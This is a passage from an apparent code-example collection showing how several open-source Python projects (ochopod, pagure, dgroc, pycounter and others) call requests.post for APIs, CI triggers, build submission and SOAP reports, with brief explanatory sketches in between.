        textstag = doc.createElement("texts")
        readcalls = doc.createElement("readCalls")
        if self.readApiKey == None:
            raise uClassifyError("Read API Key not Initialized")
        readcalls.setAttribute("readApiKey",self.readApiKey)
        root_element.appendChild(textstag)
        root_element.appendChild(readcalls)
        base64texts = []
        for text in texts:
            base64_text = base64.b64encode(text) #For Python version 3, need to change.
            base64texts.append(base64_text)
        counter = 1
        for text in base64texts:
            textbase64 = doc.createElement("textBase64")
            classifytag = doc.createElement("classifyKeywords")
            textbase64.setAttribute("id","Classifytext"+ str(counter))
            ptext = doc.createTextNode(text)
            textbase64.appendChild(ptext)
            classifytag.setAttribute("id","Classify"+ str(counter))
            classifytag.setAttribute("classifierName",classifierName)
            classifytag.setAttribute("textId","Classifytext"+str(counter))
            if username != None:
                classifytag.setAttribute("username",username)
            textstag.appendChild(textbase64)
            readcalls.appendChild(classifytag)
            counter = counter + 1
        r = requests.post(self.api_url,doc.toxml())
        if r.status_code == 200:
            success, status_code, text = self._getResponseCode(r.content)
            if success == "false":
                raise uClassifyError(text,status_code)
            else:
                return self.parseClassifyResponse(r.content,texts)
        else:
            raise uClassifyError("Bad XML Request Sent")
        
    def parseClassifyKeywordResponse(self,content,texts):
        """Parses the Classifier response from the server.
          :param content: (required) XML Response from server.
        """
        counter = 0
        doc = xml.dom.minidom.parseString(content)
        node = doc.documentElement
        result = []
        keyw = []
        classifytags = node.getElementsByTagName("classification")
        keywordstags = node.getElementsByTagName("keywords")
        for keyword in keywordstags:
            classtags = keyword.getElementsByTagName("class")
            for ctag in classtags:
                kw = ctag.firstChild.data
            if kw != "":
                keyw.append(kw)
        for classi in classifytags:
            text_coverage = classi.getAttribute("textCoverage")
            classtags = classi.getElementsByTagName("class")
            cresult = []
            for ctag in classtags:
                classname = ctag.getAttribute("className")
                cper = ctag.getAttribute("p")
                tup = (classname,cper)
                cresult.append(tup)
            result.append((texts[counter],text_coverage,cresult,keyw))
            counter = counter + 1
        return result
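
The call requests.post(self.api_url, doc.toxml()) above passes the XML as the positional data argument, so the string is sent as the raw request body. Spelling out the keyword and the content type makes the intent clearer; a small sketch (URL and payload are illustrative):

import requests

xml_payload = '<uclassify version="1.01"><texts/></uclassify>'

# Equivalent to requests.post(url, xml_payload): the string becomes the body.
r = requests.post('https://uclassify.example.com/',
                  data=xml_payload,
                  headers={'Content-Type': 'text/xml'})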

Example 43

Project: scalarizr Source File: producer.py
    def _send0(self, queue, message, success_callback=None, fail_callback=None):
        response = None
        try:
            use_json = __node__['message_format'] == 'json'
            data = message.tojson() if use_json else message.toxml()

            content_type = 'application/%s' % ('json' if use_json else 'xml')
            headers = {'Content-Type': content_type}

            if message.name not in ('Log',
                                    'OperationDefinition',
                                    'OperationProgress',
                                    'OperationResult'):
                msg_copy = P2pMessage(message.name, message.meta.copy(), deepcopy(message.body))
                try:
                    del msg_copy.body['chef']['validator_name']
                    del msg_copy.body['chef']['validator_key']
                except (KeyError, TypeError):
                    pass
                self._logger.debug("Delivering message '%s' %s. Json: %s, Headers: %s",
                                   message.name, msg_copy.body, use_json, headers)

            for f in self.filters['protocol']:
                data = f(self, queue, data, headers)

            url = self.endpoint + "/" + queue
            response = requests.post(url, data=data, headers=headers, verify=False)
            response.raise_for_status()
            self._message_delivered(queue, message, success_callback)

        except:
            e = sys.exc_info()[1]

            self._logger.warning("Message '%s' not delivered (message_id: %s)",
                message.name, message.id)
            self.fire("send_error", e, queue, message)

            if isinstance(e, requests.RequestException):
                if isinstance(e, requests.ConnectionError):
                    self._logger.warn("Connection error: %s", e)
                elif response.status_code == 401:
                    self._logger.warn("Cannot authenticate on message server. %s", e)
                elif response.status_code == 400:
                    self._logger.warn("Malformed request. %s", e)
                else:
                    self._logger.warn("Cannot post message to %s. %s", url, e)
                if response and response.status_code in (509, 400, 403):
                    raise
            else:
                self._logger.warn('Caught exception', exc_info=sys.exc_info())

            if fail_callback:
                fail_callback(queue, message, e)
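
The delivery loop above combines raise_for_status() with the requests exception hierarchy: connection failures are told apart from HTTP-level rejections. A condensed sketch of that error-handling shape (function and messages are illustrative):

import requests

def deliver(url, data, headers):
    try:
        response = requests.post(url, data=data, headers=headers)
        response.raise_for_status()  # turns 4xx/5xx into HTTPError
        return True
    except requests.ConnectionError as e:
        print('connection error: %s' % e)
    except requests.HTTPError as e:
        print('server rejected the message: %s' % e)
    except requests.RequestException as e:
        print('request failed: %s' % e)
    return False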

Example 44

Project: ochopod Source File: marathon.py
    def boot(self, lifecycle, model=Reactive, tools=None, local=False):

        #
        # - quick check to make sure we get the right implementations
        #
        assert issubclass(model, Model), 'model must derive from ochopod.api.Model'
        assert issubclass(lifecycle, LifeCycle), 'lifecycle must derive from ochopod.api.LifeCycle'

        #
        # - instantiate our flask endpoint
        # - default to a json handler for all HTTP errors (including an unexpected 500)
        #
        def _handler(error):
            http = error.code if isinstance(error, HTTPException) else 500
            return '{}', http, {'Content-Type': 'application/json; charset=utf-8'}

        web = Flask(__name__)
        for code in default_exceptions.iterkeys():
            web.error_handler_spec[None][code] = _handler

        #
        # - default presets in case we run outside of marathon (local vm testing)
        # - any environment variable prefixed with "ochopod." is of interest for us (e.g this is what the user puts
        #   in the marathon application configuration for instance)
        # - the other settings come from marathon (namely the port bindings & application/task identifiers)
        # - the MESOS_TASK_ID is important to keep around to enable task deletion via the marathon REST API
        #
        env = \
            {
                'ochopod_application':  '',
                'ochopod_cluster':      'default',
                'ochopod_debug':        'true',
                'ochopod_local':        'false',
                'ochopod_namespace':    'marathon',
                'ochopod_port':         '8080',
                'ochopod_start':        'true',
                'ochopod_task':         '',
                'ochopod_zk':           '',
                'PORT_8080':            '8080'
            }

        env.update(os.environ)
        ochopod.enable_cli_log(debug=env['ochopod_debug'] == 'true')
        try:

            #
            # - grab our environment variables (which are set by the marathon executor)
            # - extract the mesos PORT_* bindings and construct a small remapping dict
            #
            ports = {}
            logger.debug('environment ->\n%s' % '\n'.join(['\t%s -> %s' % (k, v) for k, v in env.items()]))
            for key, val in env.items():
                if key.startswith('PORT_'):
                    ports[key[5:]] = int(val)

            #
            # - keep any "ochopod_" environment variable & trim its prefix
            # - default all our settings, especially the mandatory ones
            # - the ip and zookeeper are defaulted to localhost to enable easy testing
            #
            hints = {k[8:]: v for k, v in env.items() if k.startswith('ochopod_')}
            if local or hints['local'] == 'true':

                #
                # - we are running in local mode (e.g on a dev workstation)
                # - default everything to localhost
                #
                logger.info('running in local mode (make sure you run a standalone zookeeper)')
                hints.update(
                    {
                        'fwk':          'marathon (debug)',
                        'ip':           '127.0.0.1',
                        'node':         'local',
                        'ports':        ports,
                        'public':       '127.0.0.1',
                        'zk':           '127.0.0.1:2181'
                    })
            else:

                #
                # - extend our hints
                # - add the application + task
                #
                hints.update(
                    {
                        'application':  env['MARATHON_APP_ID'][1:],
                        'fwk':          'marathon',
                        'ip':           '',
                        'node':         '',
                        'ports':        ports,
                        'public':       '',
                        'task':         env['MESOS_TASK_ID'],
                        'zk':           ''
                    })

                #
                # - use whatever subclass is implementing us to infer 'ip', 'node' and 'public'
                #
                hints.update(self.get_node_details())

                #
                # - lookup for the zookeeper connection string from environment variable or on disk
                # - we have to look into different places depending on how mesos was installed
                #
                def _1():

                    #
                    # - most recent DCOS release
                    # - $MESOS_MASTER is located in /opt/mesosphere/etc/mesos-slave-common
                    # - the snippet in there is prefixed by MESOS_MASTER=zk://<ip:port>/mesos
                    #
                    logger.debug('checking /opt/mesosphere/etc/mesos-slave-common...')
                    _, lines = shell("grep MESOS_MASTER /opt/mesosphere/etc/mesos-slave-common")
                    return lines[0][13:]

                def _2():

                    #
                    # - same as above except for slightly older DCOS releases
                    # - $MESOS_MASTER is located in /opt/mesosphere/etc/mesos-slave
                    #
                    logger.debug('checking /opt/mesosphere/etc/mesos-slave...')
                    _, lines = shell("grep MESOS_MASTER /opt/mesosphere/etc/mesos-slave")
                    return lines[0][13:]

                def _3():

                    #
                    # - a regular package install will write the slave settings under /etc/mesos/zk (the snippet in
                    #   there looks like zk://10.0.0.56:2181/mesos)
                    #
                    logger.debug('checking /etc/mesos/zk...')
                    _, lines = shell("cat /etc/mesos/zk")
                    return lines[0]

                def _4():

                    #
                    # - look for ZK from environment variables
                    # - user can pass down ZK using $ochopod_zk
                    # - this last-resort situation is used mostly for debugging
                    #
                    logger.debug('checking $ochopod_zk environment variable...')
                    return env['ochopod_zk']

                #
                # - depending on how the slave has been installed we might have to look in various places
                #   to find out what our zookeeper connection string is
                # - use urlparse to keep the host:port part of the URL (possibly including a login+password)
                #
                for method in [_1, _2, _3, _4]:
                    try:
                        hints['zk'] = urlparse(method()).netloc
                        break

                    except Exception:
                        pass

            #
            # - the cluster must be fully qualified with a namespace (which is defaulted anyway)
            #
            assert hints['zk'], 'unable to determine where zookeeper is located (unsupported/bogus mesos setup ?)'
            assert hints['cluster'] and hints['namespace'], 'no cluster and/or namespace defined (user error ?)'

            #
            # - load the tools
            #
            if tools:
                tools = {tool.tag: tool for tool in [clz() for clz in tools if issubclass(clz, Tool)] if tool.tag}
                logger.info('supporting tools %s' % ', '.join(tools.keys()))

            #
            # - start the life-cycle actor which will pass our hints (as a json object) to its underlying sub-process
            # - start our coordinator which will connect to zookeeper and attempt to lead the cluster
            # - upon grabbing the lock the model actor will start and implement the configuration process
            # - the hints are a convenient bag for any data that may change at runtime and needs to be returned (via
            #   the HTTP POST /info request)
            # - what's being registered in zookeeper is immutable though and decorated with additional details by
            #   the coordinator (especially the pod index which is derived from zookeeper)
            #
            latch = ThreadingFuture()
            logger.info('starting %s.%s (marathon) @ %s' % (hints['namespace'], hints['cluster'], hints['node']))
            breadcrumbs = deepcopy(hints)
            hints['metrics'] = {}
            hints['dependencies'] = model.depends_on
            env.update({'ochopod': json.dumps(hints)})
            executor = lifecycle.start(env, latch, hints)
            coordinator = Coordinator.start(
                hints['zk'].split(','),
                hints['namespace'],
                hints['cluster'],
                int(hints['port']),
                breadcrumbs,
                model,
                hints)

            #
            # - external hook forcing a coordinator reset
            # - this will force a re-connection to zookeeper and pod registration
            # - please note this will not impact the pod lifecycle (e.g the underlying sub-process will be
            #   left running)
            #
            @web.route('/reset', methods=['POST'])
            def _reset():

                logger.debug('http in -> /reset')
                coordinator.tell({'request': 'reset'})
                return '{}', 200, {'Content-Type': 'application/json; charset=utf-8'}

            #
            # - external hook exposing information about our pod
            # - this is a subset of what's registered in zookeeper at boot-time
            # - the data is dynamic and updated from time to time by the model and executor actors
            # - from @pferro -> the pod's dependencies defined in the model are now added as well
            #
            @web.route('/info', methods=['POST'])
            def _info():

                logger.debug('http in -> /info')
                keys = \
                    [
                        'application',
                        'dependencies',
                        'ip',
                        'metrics',
                        'node',
                        'port',
                        'ports',
                        'process',
                        'public',
                        'state',
                        'status',
                        'task'
                    ]

                subset = dict(filter(lambda i: i[0] in keys, hints.iteritems()))
                return json.dumps(subset), 200, {'Content-Type': 'application/json; charset=utf-8'}

            #
            # - external hook exposing our circular log
            # - reverse and dump ochopod.log as a json array
            #
            @web.route('/log', methods=['POST'])
            def _log():

                logger.debug('http in -> /log')
                with open(ochopod.LOG, 'r+') as log:
                    lines = [line for line in log]
                    return json.dumps(lines), 200, {'Content-Type': 'application/json; charset=utf-8'}

            #
            # - RPC call to run a custom tool within the pod
            #
            @web.route('/exec', methods=['POST'])
            def _exec():

                logger.debug('http in -> /exec')

                #
                # - make sure the command (first token in the X-Shell header) maps to a tool
                # - if no match abort on a 404
                #
                line = request.headers['X-Shell']
                tokens = line.split(' ')
                cmd = tokens[0]
                if not tools or cmd not in tools:
                    return '{}', 404, {'Content-Type': 'application/json; charset=utf-8'}

                code = 1
                tool = tools[cmd]

                #
                # - make sure the parser does not sys.exit()
                #
                class _Parser(ArgumentParser):
                    def exit(self, status=0, message=None):
                        raise ValueError(message)

                #
                # - prep a temporary directory
                # - invoke define_cmdline_parsing()
                # - switch off parsing if NotImplementedError is raised
                #
                use_parser = 1
                parser = _Parser(prog=tool.tag)
                try:
                    tool.define_cmdline_parsing(parser)

                except NotImplementedError:
                    use_parser = 0

                tmp = tempfile.mkdtemp()
                try:

                    #
                    # - parse the command line
                    # - upload any attachment
                    #
                    args = parser.parse_args(tokens[1:]) if use_parser else ' '.join(tokens[1:])
                    for tag, upload in request.files.items():
                        where = path.join(tmp, tag)
                        logger.debug('uploading %s @ %s' % (tag, tmp))
                        upload.save(where)

                    #
                    # - run the tool method
                    # - pass the temporary directory as well
                    #
                    logger.info('invoking "%s"' % line)
                    code, lines = tool.body(args, tmp)

                except ValueError as failure:

                    lines = [parser.format_help() if failure.message is None else failure.message]

                except Exception as failure:

                    lines = ['unexpected failure -> %s' % failure]

                finally:

                    #
                    # - make sure to cleanup our temporary directory
                    #
                    shutil.rmtree(tmp)

                out = \
                    {
                        'code': code,
                        'stdout': lines
                    }

                return json.dumps(out), 200, {'Content-Type': 'application/json; charset=utf-8'}

            #
            # - web-hook used to receive requests from the leader or the CLI tools
            # - those requests are passed down to the executor actor
            # - any non HTTP 200 response is a failure
            # - failure to acknowledge within the specified timeout will result in a HTTP 408 (REQUEST TIMEOUT)
            # - attempting to send a control request to a dead pod will result in a HTTP 410 (GONE)
            #
            @web.route('/control/<task>', methods=['POST'])
            @web.route('/control/<task>/<timeout>', methods=['POST'])
            def _control(task, timeout='60'):

                logger.debug('http in -> /control/%s' % task)
                if task not in ['check', 'on', 'off', 'ok', 'kill', 'signal']:

                    #
                    # - fail on a HTTP 400 if the request is not supported
                    #
                    return '{}', 400, {'Content-Type': 'application/json; charset=utf-8'}

                try:

                    ts = time.time()
                    latch = ThreadingFuture()
                    executor.tell({'request': task, 'latch': latch, 'data': request.data})
                    js, code = latch.get(timeout=int(timeout))
                    ms = 1000 * (time.time() - ts)
                    logger.debug('http out -> HTTP %s (%d ms)' % (code, ms))
                    return json.dumps(js), code, {'Content-Type': 'application/json; charset=utf-8'}

                except Timeout:

                    #
                    # - we failed to match the specified timeout
                    # - gracefully fail on a HTTP 408
                    #
                    return '{}', 408, {'Content-Type': 'application/json; charset=utf-8'}

                except ActorDeadError:

                    #
                    # - the executor has been shutdown (probably after a /control/kill)
                    # - gracefully fail on a HTTP 410
                    #
                    return '{}', 410, {'Content-Type': 'application/json; charset=utf-8'}

            #
            # - internal hook required to shutdown the web-server
            # - it's not possible to do it outside of a request handler
            # - make sure this call only comes from localhost (todo)
            #
            @web.route('/terminate', methods=['POST'])
            def _terminate():

                request.environ.get('werkzeug.server.shutdown')()
                return '{}', 200, {'Content-Type': 'application/json; charset=utf-8'}

            #
            # - run werkzeug from a separate thread to avoid blocking the main one
            # - we'll have to shut it down using a dedicated HTTP POST
            #
            class _Runner(threading.Thread):

                def run(self):
                    web.run(host='0.0.0.0', port=int(hints['port']), threaded=True)

            try:

                #
                # - block on the lifecycle actor until it goes down (usually after a /control/kill request)
                #
                _Runner().start()
                spin_lock(latch)
                logger.debug('pod is dead, idling')
                while 1:

                    #
                    # - simply idle forever (since the framework would restart any container that terminates)
                    # - /log and /hints HTTP requests will succeed (and show the pod as being killed)
                    # - any control request will now fail
                    #
                    time.sleep(60.0)

            finally:

                #
                # - when we exit the block first shutdown our executor (which may already be down)
                # - then shutdown the coordinator to un-register from zookeeper
                # - finally ask werkzeug to shutdown via a REST call
                #
                shutdown(executor)
                shutdown(coordinator)
                post('http://127.0.0.1:%s/terminate' % env['ochopod_port'])

        except KeyboardInterrupt:

            logger.fatal('CTRL-C pressed')

        except Exception as failure:

            logger.fatal('unexpected condition -> %s' % diagnostic(failure))
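
The handlers above are plain HTTP endpoints, so they can be driven from any client with requests.post. A minimal sketch, assuming a reachable pod (the address below is hypothetical; ochopod binds whatever port is passed in through hints['port']):

import requests

POD = 'http://10.0.0.12:8080'   # hypothetical pod address

# fetch the pod's registration subset (application, state, metrics, ...)
info = requests.post('%s/info' % POD)
print(info.json())

# fire a control request with a 30 second acknowledge timeout
# - HTTP 408 means the executor did not acknowledge in time
# - HTTP 410 means the pod is already dead
reply = requests.post('%s/control/check/30' % POD)
print(reply.status_code)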

Example 45

Project: dgroc Source File: dgroc.py
Function: copr_build
def copr_build(config, srpms):
    ''' Using the information provided in the configuration file,
    run the build in copr.
    '''

    # dgroc config check
    if config.has_option('main', 'upload_command') and \
            not config.has_option('main', 'upload_url'):
        raise DgrocException(
            'No `upload_url` specified in the `main` section of the dgroc '
            'configuration file.')

    if not config.has_option('main', 'copr_url'):
        warnings.warn(
            'No `copr_url` option set in the `main` section of the dgroc '
            'configuration file, using default: %s' % COPR_URL)
        copr_url = COPR_URL
    else:
        copr_url = config.get('main', 'copr_url')

    copr_url = copr_url.rstrip('/')

    insecure = False
    if config.has_option('main', 'no_ssl_check') \
            and config.get('main', 'no_ssl_check'):
        warnings.warn(
            "Option `no_ssl_check` was set to True, we won't check the ssl "
            "certificate when submitting the builds to copr")
        insecure = config.get('main', 'no_ssl_check')

    username, login, token = _get_copr_auth()

    build_ids = []
    # Build project/srpm in copr
    for project in srpms:
        if config.has_option(project, 'copr'):
            copr = config.get(project, 'copr')
        else:
            copr = project

        project_id = get_project_id(copr_url, username, copr)

        metadata = {
            'project_id': project_id,
            'chroots': get_chroots(copr_url, project_id),
        }
        url = '%s/api_2/builds' % (copr_url)
        srpm_name = os.path.basename(srpms[project])

        if config.has_option('main', 'upload_command'):
            # SRPMs are uploaded to remote location.
            srpm_file = config.get('main', 'upload_url') % srpm_name

            metadata['srpm_url'] = srpm_file
            req = requests.post(
                url, auth=(login, token), json=metadata, verify=not insecure)
        else:
            # Directly upload SRPM to COPR
            files = {
                'srpm': (srpm_name, open(srpms[project], 'rb'),
                         'application/x-rpm'),
                'metadata': ('', json.dumps(metadata)),
            }
            req = requests.post(
                url, auth=(login, token), files=files, verify=not insecure)

        if req.status_code != requests.codes.created:
            LOG.error('Failed to start build in COPR')
            LOG.error('Status code was %d: %s', req.status_code, req.reason)
            try:
                LOG.error(req.json()['message'])
            except ValueError:
                LOG.error(req.text)
            # no build was created, so there is no Location header to read
            # a build id from: skip this project
            continue

        build_url = req.headers['Location']
        build_id = build_url.split('/')[-1]
        build_ids.append(build_id)

    return build_ids
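
The direct-upload branch above reduces to one multipart POST against the api_2 builds endpoint. A stripped-down sketch, assuming placeholder credentials, project id and SRPM path:

import json
import requests

url = 'https://copr.fedorainfracloud.org/api_2/builds'   # placeholder copr_url
metadata = {'project_id': 1234, 'chroots': ['fedora-rawhide-x86_64']}
files = {
    'srpm': ('foo-1.0-1.src.rpm', open('foo-1.0-1.src.rpm', 'rb'),
             'application/x-rpm'),
    'metadata': ('', json.dumps(metadata)),
}
req = requests.post(url, auth=('login', 'token'), files=files)

# a successful submission answers 201 and points at the new build
if req.status_code == requests.codes.created:
    print(req.headers['Location'])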

Example 46

Project: pagure Source File: pagure_ci_server.py
@trollius.coroutine
def handle_messages():
    ''' Handles connecting to redis and acting upon messages received.
    In this case, it means triggering a build on jenkins based on the
    information provided.
    '''

    host = pagure.APP.config.get('REDIS_HOST', '0.0.0.0')
    port = pagure.APP.config.get('REDIS_PORT', 6379)
    dbname = pagure.APP.config.get('REDIS_DB', 0)
    connection = yield trollius.From(trollius_redis.Connection.create(
        host=host, port=port, db=dbname))

    # Create subscriber.
    subscriber = yield trollius.From(connection.start_subscribe())

    # Subscribe to channel.
    yield trollius.From(subscriber.subscribe(['pagure.ci']))

    # Inside a while loop, wait for incoming events.
    while True:
        reply = yield trollius.From(subscriber.next_published())
        LOG.info(
            'Received: %s on channel: %s',
            repr(reply.value), reply.channel)
        data = json.loads(reply.value)

        pr_id = data['pr']['id']
        pr_uid = data['pr']['uid']
        branch = data['pr']['branch_from']
        LOG.info('Looking for PR: %s', pr_uid)
        request = pagure.lib.get_request_by_uid(pagure.SESSION, pr_uid)

        if not request:
            LOG.warning(
                'No request could be found from the message %s', data)
            continue

        LOG.info(
            "Trigger on %s PR #%s from %s: %s",
            request.project.fullname, pr_id,
            request.project_from.fullname, branch)

        url = request.project.ci_hook.ci_url.rstrip('/')

        if data['ci_type'] == 'jenkins':
            url = url + '/buildWithParameters'
            repo = '%s/%s' % (
                pagure.APP.config['GIT_URL_GIT'].rstrip('/'),
                request.project_from.path)
            LOG.info(
                'Triggering the build at: %s, for repo: %s', url, repo)
            requests.post(
                url,
                data={
                    'token': request.project.ci_hook.pagure_ci_token,
                    'cause': pr_id,
                    'REPO': repo,
                    'BRANCH': branch
                }
            )
        else:
            LOG.warning('Un-supported CI type')

        LOG.info('Ready for another')
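
The Jenkins trigger itself needs nothing beyond the job URL, its trigger token and the form fields the job expects. A standalone sketch with made-up values:

import requests

url = 'https://jenkins.example.com/job/pagure-ci/buildWithParameters'
requests.post(url, data={
    'token': 's3cr3t',                                  # job trigger token
    'cause': 42,                                        # PR id, shown as the build cause
    'REPO': 'https://git.example.com/forks/repo.git',   # parameters defined by the job
    'BRANCH': 'feature-branch',
})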

Example 47

Project: logtacts Source File: send_contact_reminders.py
    def handle(self, *args, **options):
        logger.debug("Starting contact reminder sending")
        last_month = timezone.now() - timedelta(weeks=4)
        profiles_opted_in = Profile.objects.filter(send_contact_reminders=True)
        for profile in profiles_opted_in:
            logger.debug("Starting compilation for {}".format(profile.user))
            contact = Contact.objects.get_contacts_for_user(
                profile.user
            ).filter(
                Q(last_contact__lte=last_month) | Q(last_contact=None),
                should_surface=True,
            ).order_by('?')[0]
            subject = '[Contact Otter] Contact reminder'
            context = {
                'contact': contact,
                'domain': Site.objects.get_current().domain,
            }
            txt = get_template('email/contact_reminder.txt').render(context)
            html = get_template('email/contact_reminder.html').render(context)
            message = EmailMultiAlternatives(
                subject=subject,
                body=txt,
                from_email="ContactOtter <[email protected]>",
                to=[profile.user.email],
            )
            message.attach_alternative(html, "text/html")
            try:
                logger.debug("Trying to send message to {} about {}".format(
                    profile.user, contact
                ))
                message.send()
                logger.debug("Sent message to {} successfuly".format(profile.user))
            except:
                logger.exception('Problem sending reminder for %s' % (profile))
                try:
                    if not settings.DEBUG:
                        payload = {
                            'text': 'Error in contactotter reminder: {}'.format(profile)
                        }
                        r = requests.post(
                            settings.SLACK_WEBHOOK_URL,
                            data=json.dumps(payload),
                        )
                except:
                    logger.exception("Error sending error to slack")

        profiles_opted_in = Profile.objects.filter(send_birthday_reminders=True)
        for profile in profiles_opted_in:
            birthdays = ContactField.objects.filter(
                Q(label='Birthday') | Q(label='birthday') | Q(label='BIRTHDAY'),
                kind=contact_constants.FIELD_TYPE_DATE,
                value=timezone.now().strftime("%Y-%m-%d")
            )
            contacts = None
            if birthdays:
                contacts = [birthday.contact for birthday in birthdays]
            if contacts:
                context = {
                    'contacts': contacts,
                    'domain': Site.objects.get_current().domain,
                }
                subject="[ContactOtter] Birthday reminder"
                txt = get_template('email/birthday_reminder.txt').render(context)
                html = get_template('email/birthday_reminder.html').render(context)
                message = EmailMultiAlternatives(
                    subject=subject,
                    body=txt,
                    from_email='ContactOtter <[email protected]>',
                    to=[profile.user.email],
                )
                message.attach_alternative(html, "text/html")
                try:
                    logger.debug("Trying to send message to {} about {}".format(
                        profile.user, contacts
                    ))
                    message.send()
                    logger.debug("Sent message to {} successfuly".format(profile.user))
                except:
                    logger.exception('Problem sending reminder for %s' % (profile))
                    try:
                        if not settings.DEBUG:
                            payload = {
                                'text': 'Error in logtacts reminder: {}'.format(profile)
                            }
                            r = requests.post(
                                settings.SLACK_WEBHOOK_URL,
                                data=json.dumps(payload),
                            )
                    except:
                        logger.exception("Error sending error to slack")

Example 48

Project: pycounter Source File: sushi.py
def get_sushi_stats_raw(wsdl_url, start_date, end_date, requestor_id=None,
                        requestor_email=None, requestor_name=None,
                        customer_reference=None, customer_name=None,
                        report="JR1", release=4, sushi_dump=False):
    """Get SUSHI stats for a given site in raw XML format.

    :param wsdl_url: URL to SOAP WSDL for this provider

    :param start_date: start date for report (must be first day of a month)

    :param end_date: end date for report (must be last day of a month)

    :param requestor_id: requestor ID as defined by SUSHI protocol

    :param requestor_email: requestor email address, if required by provider

    :param requestor_name: Internationally recognized organization name

    :param customer_reference: customer reference number as defined by SUSHI
        protocol

    :param customer_name: Internationally recognized organization name

    :param report: report type, values defined by SUSHI protocol

    :param release: report release number (should generally be `4`.)

    :param sushi_dump: produces dump of XML to DEBUG logger

    """
    root = etree.Element("{%(SOAP-ENV)s}Envelope" % NS, nsmap=NS)
    body = etree.SubElement(root, "{%(SOAP-ENV)s}Body" % NS)
    timestamp = arrow.utcnow().isoformat()
    rr = etree.SubElement(body, "{%(sushicounter)s}ReportRequest" % NS,
                          {
                              'Created': timestamp,
                              'ID': str(uuid.uuid4())
                          })

    req = etree.SubElement(rr, "{%(sushi)s}Requestor" % NS)
    rid = etree.SubElement(req, "{%(sushi)s}ID" % NS)
    rid.text = requestor_id
    req_name_element = etree.SubElement(req, "{%(sushi)s}Name" % NS)
    req_name_element.text = requestor_name
    req_email_element = etree.SubElement(req, "{%(sushi)s}Email" % NS)
    req_email_element.text = requestor_email

    cust_ref_elem = etree.SubElement(rr, "{%(sushi)s}CustomerReference" % NS)
    cid = etree.SubElement(cust_ref_elem, "{%(sushi)s}ID" % NS)
    cid.text = customer_reference
    cust_name_elem = etree.SubElement(cust_ref_elem, "{%(sushi)s}Name" % NS)
    cust_name_elem.text = customer_name

    report_def_elem = etree.SubElement(rr, "{%(sushi)s}ReportDefinition" % NS,
                                       Name=report, Release=str(release))
    filters = etree.SubElement(report_def_elem, "{%(sushi)s}Filters" % NS)
    udr = etree.SubElement(filters, "{%(sushi)s}UsageDateRange" % NS)
    beg = etree.SubElement(udr, "{%(sushi)s}Begin" % NS)
    beg.text = start_date.strftime("%Y-%m-%d")
    end = etree.SubElement(udr, "{%(sushi)s}End" % NS)
    end.text = end_date.strftime("%Y-%m-%d")

    payload = etree.tostring(root, pretty_print=True,
                             xml_declaration=True, encoding="utf-8")

    headers = {"SOAPAction": '"SushiService:GetReportIn"',
               "Content-Type": "text/xml; charset=UTF-8",
               "User-Agent": "pycounter/%s" % pycounter.__version__,
               "Content-Length": str(len(payload))}

    response = requests.post(url=wsdl_url,
                             headers=headers,
                             data=payload,
                             verify=False)

    if sushi_dump:
        logger.debug("SUSHI DUMP: request: %s \n\n response: %s",
                     payload,
                     response.content)
    return response.content
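
Stripped of the lxml envelope building, this is the generic recipe for SOAP over requests: POST the XML payload with the SOAPAction and Content-Type headers set by hand. A condensed sketch with a hard-coded (empty) envelope and a placeholder endpoint:

import requests

envelope = (
    '<?xml version="1.0" encoding="utf-8"?>'
    '<SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/">'
    '<SOAP-ENV:Body/></SOAP-ENV:Envelope>'
)
headers = {
    'SOAPAction': '"SushiService:GetReportIn"',
    'Content-Type': 'text/xml; charset=UTF-8',
    'Content-Length': str(len(envelope)),
}

# verify=False mirrors the example above; keep TLS verification on in production
response = requests.post('https://sushi.example.com/soap', headers=headers,
                         data=envelope, verify=False)
print(response.content)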

Example 49

Project: ochothon Source File: deploy.py
    def run(self):
        try:

            #
            # - we need to pass the framework master IPs around (ugly)
            #
            assert 'MARATHON_MASTER' in os.environ, '$MARATHON_MASTER not specified (check your portal pod)'
            master = choice(os.environ['MARATHON_MASTER'].split(','))
            headers = \
                {
                    'content-type': 'application/json',
                    'accept': 'application/json'
                }

            with open(self.template, 'r') as f:

                #
                # - parse the template yaml file (e.g container definition)
                #
                raw = yaml.load(f)
                assert raw, 'empty YAML input (user error ?)'

                #
                # - merge with our defaults
                # - we want at least the cluster & image settings
                # - TCP 8080 is added by default to the port list
                #
                defaults = \
                    {
                        'start': True,
                        'debug': False,
                        'settings': {},
                        'ports': [8080],
                        'verbatim': {}
                    }

                cfg = merge(defaults, raw)
                assert 'cluster' in cfg, 'cluster identifier undefined (user error ?)'
                assert 'image' in cfg, 'docker image undefined (user error ?)'

                #
                # - if a suffix is specified append it to the cluster identifier
                #
                if self.suffix:
                    cfg['cluster'] = '%s-%s' % (cfg['cluster'], self.suffix)

                #
                # - timestamp the application (we really want a new uniquely identified application)
                # - lookup the optional overrides and merge with our pod settings if specified
                # - this is what happens when the -o option is used
                #
                stamp = datetime.datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d-%H-%M-%S')
                qualified = '%s.%s' % (self.namespace, cfg['cluster'])
                application = 'ochopod.%s-%s' % (qualified, stamp)
                if qualified in self.overrides:

                    blk = self.overrides[qualified]
                    logger.debug('%s : overriding %d settings (%s)' % (self.template, len(blk), qualified))
                    cfg['settings'] = merge(cfg['settings'], blk)

                def _nullcheck(cfg, prefix):

                    #
                    # - walk through the settings and flag any null value
                    #
                    missing = []
                    if cfg is not None:
                        for key, value in cfg.items():
                            if value is None:
                                missing += ['%s.%s' % ('.'.join(prefix), key)]
                            elif isinstance(value, dict):
                                missing += _nullcheck(value, prefix + [key])

                    return missing

                missing = _nullcheck(cfg['settings'], ['pod'])
                assert not missing, '%d setting(s) missing ->\n\t - %s' % (len(missing), '\n\t - '.join(missing))

                #
                # - if we still have no target default it to 1 single pod
                #
                if not self.pods:
                    self.pods = 1

                #
                # - setup our port list
                # - the port binding is specified either by an integer (container port -> dynamic mesos port), by
                #   two integers (container port -> host port) or by an integer followed by a * (container port ->
                #   same port on the host)
                # - on top of that, all those options allow to specify whether the protocol is TCP or UDP by adding
                #   the desired protocol after the binding (e.g. '8080 tcp' or '8125 * udp'); TCP is the default
                #   if no protocol is specified.
                # - the marathon pods must by design map /etc/mesos
                #
                def _parse_port(token):
                    
                    #
                    # - tries to return an int if possible, a string otherwise
                    #
                    def get_token_no_protocol(token):
                        # - remove the protocol piece
                        t = token[:-4].strip()
                        try:
                            return int(t)
                        except ValueError:
                            return t
                    
                    if isinstance(token, str) and token.lower().endswith(' udp'):
                        protocol = 'udp'
                        token_no_protocol = get_token_no_protocol(token)
